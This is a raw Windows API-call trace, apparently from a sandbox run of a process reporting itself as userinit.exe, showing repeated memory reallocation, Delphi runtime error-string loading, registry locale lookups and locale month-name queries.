[0087.437] GlobalReAlloc (hMem=0x79000c, dwBytes=0x96000, uFlags=0x2) returned 0x79000c
[0087.499] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.500] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.500] GlobalUnlock (hMem=0x79000c) returned 0
[0087.500] GlobalReAlloc (hMem=0x79000c, dwBytes=0x98000, uFlags=0x2) returned 0x79000c
[0087.516] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.517] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.517] GlobalUnlock (hMem=0x79000c) returned 0
[0087.517] GlobalReAlloc (hMem=0x79000c, dwBytes=0x9a000, uFlags=0x2) returned 0x79000c
[0087.533] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.534] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.534] GlobalUnlock (hMem=0x79000c) returned 0
[0087.534] GlobalReAlloc (hMem=0x79000c, dwBytes=0x9c000, uFlags=0x2) returned 0x79000c
[0087.597] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.598] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.598] GlobalUnlock (hMem=0x79000c) returned 0
[0087.598] GlobalReAlloc (hMem=0x79000c, dwBytes=0x9e000, uFlags=0x2) returned 0x79000c
[0087.615] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.616] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.616] GlobalUnlock (hMem=0x79000c) returned 0
[0087.616] GlobalReAlloc (hMem=0x79000c, dwBytes=0xa0000, uFlags=0x2) returned 0x79000c
[0087.633] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.634] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.634] GlobalUnlock (hMem=0x79000c) returned 0
[0087.634] GlobalReAlloc (hMem=0x79000c, dwBytes=0xa2000, uFlags=0x2) returned 0x79000c
[0087.700] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.701] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.701] GlobalUnlock (hMem=0x79000c) returned 0
[0087.701] GlobalReAlloc (hMem=0x79000c, dwBytes=0xa4000, uFlags=0x2) returned 0x79000c
[0087.717] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.718] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.718] GlobalUnlock (hMem=0x79000c) returned 0
[0087.718] GlobalReAlloc (hMem=0x79000c, dwBytes=0xa6000, uFlags=0x2) returned 0x79000c
[0087.800] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.801] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.801] GlobalUnlock (hMem=0x79000c) returned 0
[0087.801] GlobalReAlloc (hMem=0x79000c, dwBytes=0xa8000, uFlags=0x2) returned 0x79000c
[0087.819] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.819] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.819] GlobalUnlock (hMem=0x79000c) returned 0
[0087.820] GlobalReAlloc (hMem=0x79000c, dwBytes=0xaa000, uFlags=0x2) returned 0x79000c
[0087.886] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.887] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.887] GlobalUnlock (hMem=0x79000c) returned 0
[0087.887] GlobalReAlloc (hMem=0x79000c, dwBytes=0xac000, uFlags=0x2) returned 0x79000c
[0087.903] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.904] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.904] GlobalUnlock (hMem=0x79000c) returned 0
[0087.904] GlobalReAlloc (hMem=0x79000c, dwBytes=0xae000, uFlags=0x2) returned 0x79000c
[0087.920] GlobalLock (hMem=0x79000c) returned 0xe30020
[0087.921] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0087.921] GlobalUnlock (hMem=0x79000c) returned 0
[0087.921] GlobalReAlloc (hMem=0x79000c, dwBytes=0xb0000, uFlags=0x2) returned 0x79000c
[0087.986] GlobalLock (hMem=0x79000c) returned 0x2730020
[0087.987] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0087.987] GlobalUnlock (hMem=0x79000c) returned 0
[0087.987] GlobalReAlloc (hMem=0x79000c, dwBytes=0xb2000, uFlags=0x2) returned 0x79000c
[0088.005] GlobalLock (hMem=0x79000c) returned 0xe30020
[0088.006] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0088.006] GlobalUnlock (hMem=0x79000c) returned 0
[0088.006] GlobalReAlloc (hMem=0x79000c, dwBytes=0xb4000, uFlags=0x2) returned 0x79000c
[0088.072] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.073] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.073] GlobalUnlock (hMem=0x79000c) returned 0
[0088.073] GlobalReAlloc (hMem=0x79000c, dwBytes=0xb6000, uFlags=0x2) returned 0x79000c
[0088.092] GlobalLock (hMem=0x79000c) returned 0xe30020
[0088.093] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0088.093] GlobalUnlock (hMem=0x79000c) returned 0
[0088.093] GlobalReAlloc (hMem=0x79000c, dwBytes=0xb8000, uFlags=0x2) returned 0x79000c
[0088.158] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.159] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.159] GlobalUnlock (hMem=0x79000c) returned 0
[0088.159] GlobalReAlloc (hMem=0x79000c, dwBytes=0xba000, uFlags=0x2) returned 0x79000c
[0088.177] GlobalLock (hMem=0x79000c) returned 0xe30020
[0088.178] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0088.178] GlobalUnlock (hMem=0x79000c) returned 0
[0088.178] GlobalReAlloc (hMem=0x79000c, dwBytes=0xbc000, uFlags=0x2) returned 0x79000c
[0088.194] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.195] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.195] GlobalUnlock (hMem=0x79000c) returned 0
[0088.195] GlobalReAlloc (hMem=0x79000c, dwBytes=0xbe000, uFlags=0x2) returned 0x79000c
[0088.261] GlobalLock (hMem=0x79000c) returned 0xe30020
[0088.262] GlobalHandle (pMem=0xe30020) returned 0x79000c
[0088.262] GlobalUnlock (hMem=0x79000c) returned 0
[0088.262] GlobalReAlloc (hMem=0x79000c, dwBytes=0xc0000, uFlags=0x2) returned 0x79000c
[0088.279] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.280] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.280] GlobalUnlock (hMem=0x79000c) returned 0
[0088.280] GlobalReAlloc (hMem=0x79000c, dwBytes=0xc2000, uFlags=0x2) returned 0x79000c
[0088.347] GlobalLock (hMem=0x79000c) returned 0x2800020
[0088.348] GlobalHandle (pMem=0x2800020) returned 0x79000c
[0088.348] GlobalUnlock (hMem=0x79000c) returned 0
[0088.348] GlobalReAlloc (hMem=0x79000c, dwBytes=0xc4000, uFlags=0x2) returned 0x79000c
[0088.368] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.369] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.369] GlobalUnlock (hMem=0x79000c) returned 0
[0088.369] GlobalReAlloc (hMem=0x79000c, dwBytes=0xc6000, uFlags=0x2) returned 0x79000c
[0088.435] GlobalLock (hMem=0x79000c) returned 0x2800020
[0088.436] GlobalHandle (pMem=0x2800020) returned 0x79000c
[0088.436] GlobalUnlock (hMem=0x79000c) returned 0
[0088.436] GlobalReAlloc (hMem=0x79000c, dwBytes=0xc8000, uFlags=0x2) returned 0x79000c
[0088.454] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.455] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.455] GlobalUnlock (hMem=0x79000c) returned 0
[0088.455] GlobalReAlloc (hMem=0x79000c, dwBytes=0xca000, uFlags=0x2) returned 0x79000c
[0088.519] GlobalLock (hMem=0x79000c) returned 0x2800020
[0088.520] GlobalHandle (pMem=0x2800020) returned 0x79000c
[0088.520] GlobalUnlock (hMem=0x79000c) returned 0
[0088.520] GlobalReAlloc (hMem=0x79000c, dwBytes=0xcc000, uFlags=0x2) returned 0x79000c
[0088.539] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.540] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.540] GlobalUnlock (hMem=0x79000c) returned 0
[0088.540] GlobalReAlloc (hMem=0x79000c, dwBytes=0xce000, uFlags=0x2) returned 0x79000c
[0088.637] GlobalLock (hMem=0x79000c) returned 0x2800020
[0088.638] GlobalHandle (pMem=0x2800020) returned 0x79000c
[0088.638] GlobalUnlock (hMem=0x79000c) returned 0
[0088.638] GlobalReAlloc (hMem=0x79000c, dwBytes=0xd0000, uFlags=0x2) returned 0x79000c
[0088.657] GlobalLock (hMem=0x79000c) returned 0x28d0020
[0088.657] GlobalHandle (pMem=0x28d0020) returned 0x79000c
[0088.658] GlobalUnlock (hMem=0x79000c) returned 0
[0088.658] GlobalReAlloc (hMem=0x79000c, dwBytes=0xd2000, uFlags=0x2) returned 0x79000c
[0088.724] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.725] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.725] GlobalUnlock (hMem=0x79000c) returned 0
[0088.725] GlobalReAlloc (hMem=0x79000c, dwBytes=0xd4000, uFlags=0x2) returned 0x79000c
[0088.752] GlobalLock (hMem=0x79000c) returned 0x2810020
[0088.752] GlobalHandle (pMem=0x2810020) returned 0x79000c
[0088.752] GlobalUnlock (hMem=0x79000c) returned 0
[0088.752] GlobalReAlloc (hMem=0x79000c, dwBytes=0xd6000, uFlags=0x2) returned 0x79000c
[0088.820] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.821] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.821] GlobalUnlock (hMem=0x79000c) returned 0
[0088.821] GlobalReAlloc (hMem=0x79000c, dwBytes=0xd8000, uFlags=0x2) returned 0x79000c
[0088.841] GlobalLock (hMem=0x79000c) returned 0x2810020
[0088.842] GlobalHandle (pMem=0x2810020) returned 0x79000c
[0088.842] GlobalUnlock (hMem=0x79000c) returned 0
[0088.842] GlobalReAlloc (hMem=0x79000c, dwBytes=0xda000, uFlags=0x2) returned 0x79000c
[0088.909] GlobalLock (hMem=0x79000c) returned 0x2730020
[0088.910] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0088.910] GlobalUnlock (hMem=0x79000c) returned 0
[0088.910] GlobalReAlloc (hMem=0x79000c, dwBytes=0xdc000, uFlags=0x2) returned 0x79000c
[0088.933] GlobalLock (hMem=0x79000c) returned 0x2810020
[0088.934] GlobalHandle (pMem=0x2810020) returned 0x79000c
[0088.934] GlobalUnlock (hMem=0x79000c) returned 0
[0088.934] GlobalReAlloc (hMem=0x79000c, dwBytes=0xde000, uFlags=0x2) returned 0x79000c
[0089.003] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.004] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.004] GlobalUnlock (hMem=0x79000c) returned 0
[0089.004] GlobalReAlloc (hMem=0x79000c, dwBytes=0xe0000, uFlags=0x2) returned 0x79000c
[0089.027] GlobalLock (hMem=0x79000c) returned 0x2810020
[0089.028] GlobalHandle (pMem=0x2810020) returned 0x79000c
[0089.028] GlobalUnlock (hMem=0x79000c) returned 0
[0089.028] GlobalReAlloc (hMem=0x79000c, dwBytes=0xe2000, uFlags=0x2) returned 0x79000c
[0089.099] GlobalLock (hMem=0x79000c) returned 0x2900020
[0089.101] GlobalHandle (pMem=0x2900020) returned 0x79000c
[0089.101] GlobalUnlock (hMem=0x79000c) returned 0
[0089.101] GlobalReAlloc (hMem=0x79000c, dwBytes=0xe4000, uFlags=0x2) returned 0x79000c
[0089.124] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.125] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.125] GlobalUnlock (hMem=0x79000c) returned 0
[0089.125] GlobalReAlloc (hMem=0x79000c, dwBytes=0xe6000, uFlags=0x2) returned 0x79000c
[0089.194] GlobalLock (hMem=0x79000c) returned 0x2820020
[0089.195] GlobalHandle (pMem=0x2820020) returned 0x79000c
[0089.195] GlobalUnlock (hMem=0x79000c) returned 0
[0089.195] GlobalReAlloc (hMem=0x79000c, dwBytes=0xe8000, uFlags=0x2) returned 0x79000c
[0089.217] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.217] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.217] GlobalUnlock (hMem=0x79000c) returned 0
[0089.218] GlobalReAlloc (hMem=0x79000c, dwBytes=0xea000, uFlags=0x2) returned 0x79000c
[0089.287] GlobalLock (hMem=0x79000c) returned 0x2820020
[0089.288] GlobalHandle (pMem=0x2820020) returned 0x79000c
[0089.288] GlobalUnlock (hMem=0x79000c) returned 0
[0089.288] GlobalReAlloc (hMem=0x79000c, dwBytes=0xec000, uFlags=0x2) returned 0x79000c
[0089.312] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.313] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.313] GlobalUnlock (hMem=0x79000c) returned 0
[0089.313] GlobalReAlloc (hMem=0x79000c, dwBytes=0xee000, uFlags=0x2) returned 0x79000c
[0089.384] GlobalLock (hMem=0x79000c) returned 0x2820020
[0089.385] GlobalHandle (pMem=0x2820020) returned 0x79000c
[0089.385] GlobalUnlock (hMem=0x79000c) returned 0
[0089.385] GlobalReAlloc (hMem=0x79000c, dwBytes=0xf0000, uFlags=0x2) returned 0x79000c
[0089.409] GlobalLock (hMem=0x79000c) returned 0x2910020
[0089.410] GlobalHandle (pMem=0x2910020) returned 0x79000c
[0089.410] GlobalUnlock (hMem=0x79000c) returned 0
[0089.410] GlobalReAlloc (hMem=0x79000c, dwBytes=0xf2000, uFlags=0x2) returned 0x79000c
[0089.482] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.484] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.484] GlobalUnlock (hMem=0x79000c) returned 0
[0089.484] GlobalReAlloc (hMem=0x79000c, dwBytes=0xf4000, uFlags=0x2) returned 0x79000c
[0089.559] GlobalLock (hMem=0x79000c) returned 0x2830020
[0089.560] GlobalHandle (pMem=0x2830020) returned 0x79000c
[0089.560] GlobalUnlock (hMem=0x79000c) returned 0
[0089.560] GlobalReAlloc (hMem=0x79000c, dwBytes=0xf6000, uFlags=0x2) returned 0x79000c
[0089.584] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.585] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.585] GlobalUnlock (hMem=0x79000c) returned 0
[0089.585] GlobalReAlloc (hMem=0x79000c, dwBytes=0xf8000, uFlags=0x2) returned 0x79000c
[0089.644] GlobalLock (hMem=0x79000c) returned 0x2830020
[0089.645] GlobalHandle (pMem=0x2830020) returned 0x79000c
[0089.645] GlobalUnlock (hMem=0x79000c) returned 0
[0089.645] GlobalReAlloc (hMem=0x79000c, dwBytes=0xfa000, uFlags=0x2) returned 0x79000c
[0089.666] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.667] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.667] GlobalUnlock (hMem=0x79000c) returned 0
[0089.667] GlobalReAlloc (hMem=0x79000c, dwBytes=0xfc000, uFlags=0x2) returned 0x79000c
[0089.736] GlobalLock (hMem=0x79000c) returned 0x2830020
[0089.737] GlobalHandle (pMem=0x2830020) returned 0x79000c
[0089.737] GlobalUnlock (hMem=0x79000c) returned 0
[0089.737] GlobalReAlloc (hMem=0x79000c, dwBytes=0xfe000, uFlags=0x2) returned 0x79000c
[0089.769] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.770] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.770] GlobalUnlock (hMem=0x79000c) returned 0
[0089.770] GlobalReAlloc (hMem=0x79000c, dwBytes=0x100000, uFlags=0x2) returned 0x79000c
[0089.847] GlobalLock (hMem=0x79000c) returned 0x2830020
[0089.848] GlobalHandle (pMem=0x2830020) returned 0x79000c
[0089.848] GlobalUnlock (hMem=0x79000c) returned 0
[0089.848] GlobalReAlloc (hMem=0x79000c, dwBytes=0x102000, uFlags=0x2) returned 0x79000c
[0089.921] GlobalLock (hMem=0x79000c) returned 0x2940020
[0089.922] GlobalHandle (pMem=0x2940020) returned 0x79000c
[0089.922] GlobalUnlock (hMem=0x79000c) returned 0
[0089.922] GlobalReAlloc (hMem=0x79000c, dwBytes=0x104000, uFlags=0x2) returned 0x79000c
[0089.948] GlobalLock (hMem=0x79000c) returned 0x2730020
[0089.949] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0089.949] GlobalUnlock (hMem=0x79000c) returned 0
[0089.949] GlobalReAlloc (hMem=0x79000c, dwBytes=0x106000, uFlags=0x2) returned 0x79000c
[0090.021] GlobalLock (hMem=0x79000c) returned 0x2840020
[0090.022] GlobalHandle (pMem=0x2840020) returned 0x79000c
[0090.022] GlobalUnlock (hMem=0x79000c) returned 0
[0090.022] GlobalReAlloc (hMem=0x79000c, dwBytes=0x108000, uFlags=0x2) returned 0x79000c
[0090.047] GlobalLock (hMem=0x79000c) returned 0x2730020
[0090.048] GlobalHandle (pMem=0x2730020) returned 0x79000c
[0090.048] GlobalUnlock (hMem=0x79000c) returned 0
[0090.048] GlobalReAlloc (hMem=0x79000c, dwBytes=0x10a000, uFlags=0x2) returned 0x79000c
[0090.121] GlobalLock (hMem=0x79000c) returned 0x2840020
[0090.122] GlobalHandle (pMem=0x2840020) returned 0x79000c
[0090.122] GlobalUnlock (hMem=0x79000c) returned 0
[0090.122] GlobalReAlloc (hMem=0x79000c, dwBytes=0x10c000, uFlags=0x2) returned 0x79000c
[0090.180] GlobalLock (hMem=0x79000c) returned 0x2730020
[0090.181] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2840000
[0090.181] VirtualAlloc (lpAddress=0x2840000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2840000
[0090.231] GetKeyboardType (nTypeFlag=0) returned 4
[0090.231] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.231] GetStartupInfoA (in: lpStartupInfo=0x14f7d0 | out: lpStartupInfo=0x14f7d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0090.231] GetVersion () returned 0x1db10106
[0090.231] GetVersion () returned 0x1db10106
[0090.231] GetCurrentThreadId () returned 0xf54
[0090.231] GetModuleFileNameA (in: hModule=0x2950000, lpFilename=0x14f2cc, nSize=0x105 | out: lpFilename="\xdc\xf2\x14" (normalized: "c:\\windows\\system32\\üò\x14")) returned 0x0
[0090.232] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f1a7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.232] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f2bc | out: phkResult=0x14f2bc*=0x0) returned 0x2
[0090.232] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f2bc | out: phkResult=0x14f2bc*=0x0) returned 0x2
[0090.232] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f2bc | out: phkResult=0x14f2bc*=0x0) returned 0x2
[0090.232] lstrcpynA (in: lpString1=0x14f1a7, lpString2="\xdc\xf2\x14", iMaxLength=261 | out: lpString1="\xdc\xf2\x14") returned="\xdc\xf2\x14"
[0090.232] GetThreadLocale () returned 0x409
[0090.232] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x14f2b7, cchData=5 | out: lpLCData="ENU") returned 4
[0090.232] lstrlenA (lpString="\xdc\xf2\x14") returned 3
[0090.232] LoadStringA (in: hInstance=0x2950000, uID=0xffc4, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0090.232] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2adcc0
[0090.232] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a70000
[0090.232] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2aecc0
[0090.232] VirtualAlloc (lpAddress=0x2a70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a70000
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffc3, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffc1, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffc2, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffd4, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffdd, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffd3, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffd0, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffd7, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffd6, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe8, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe9, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffea, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe7, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe5, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe3, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe2, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe1, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffe0, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xffff, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xfffe, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xfffd, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xfffc, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xfffb, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xfffa, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0090.233] LoadStringA (in: hInstance=0x2950000, uID=0xfff9, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0090.234] LoadStringA (in: hInstance=0x2950000, uID=0xfff8, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0090.234] LoadStringA (in: hInstance=0x2950000, uID=0xfff7, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0090.234] LoadStringA (in: hInstance=0x2950000, uID=0xfff6, lpBuffer=0x14f3f0, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0090.234] LoadStringA (in: hInstance=0x2950000, uID=0xfff4, lpBuffer=0x14f3dc, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0090.234] LoadStringA (in: hInstance=0x2950000, uID=0xffe4, lpBuffer=0x14f3dc, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0090.234] GetVersionExA (in: lpVersionInformation=0x14f774*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2950000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x95\x02·\"\x95\x02\x0cø\x14") | out: lpVersionInformation=0x14f774*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0090.234] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.234] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0090.234] GetThreadLocale () returned 0x409
[0090.234] GetThreadLocale () returned 0x409
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Jan") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x14f64c, cchData=256 | out: lpLCData="January") returned 8
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Feb") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x14f64c, cchData=256 | out: lpLCData="February") returned 9
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Mar") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x14f64c, cchData=256 | out: lpLCData="March") returned 6
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Apr") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x14f64c, cchData=256 | out: lpLCData="April") returned 6
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x14f64c, cchData=256 | out: lpLCData="May") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x14f64c, cchData=256 | out: lpLCData="May") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Jun") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x14f64c, cchData=256 | out: lpLCData="June") returned 5
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Jul") returned 4
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x14f64c, cchData=256 | out: lpLCData="July") returned 5
[0090.234] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Aug") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x14f64c, cchData=256 | out: lpLCData="August") returned 7
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Sep") returned 4
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x14f64c, cchData=256 | out: lpLCData="September") returned 10
[0090.235] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x14f64c, cchData=256 | out: lpLCData="Oct") returned 4
